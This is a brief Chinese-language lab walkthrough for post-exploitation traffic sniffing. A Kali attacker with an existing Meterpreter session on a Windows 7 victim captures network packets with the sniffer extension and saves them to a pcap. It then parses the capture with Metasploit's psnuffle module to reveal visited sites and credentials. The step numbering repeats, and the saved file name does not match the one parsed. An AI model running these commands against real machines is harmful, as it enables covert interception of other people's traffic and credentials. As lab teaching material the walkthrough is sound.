环境：小攻：Kali 2020，ip：192.168.1.133

          小受：win7 x86，ip：192.168.1.137

一、生成木马及监听主机参考上篇文章：

内网渗透 -- 提升权限(利用提权漏洞)

二、捕获数据包

1、加载sniffer：load sniffer

2、查看网卡信息：sniffer_interfaces

3、开启网卡监听，内容会自动保存到缓存中：sniffer_start 2

4、进入小受，然后随便访问几个网站

4、将捕获到数据保存下来，默认保存地址/root

sniffer_dump 2 aiyou.cap

5、启动wireshark，打开保存下来的文件

三、通过解包模块解包

1、选择解包模块

use auxiliary/sniffer/psnuffle

2、查看需要设置的参数

show options

3、设置解包文件路径

set pcapfile /root/2.cap

4、运行，run，可以查看到我们刚才访问的地址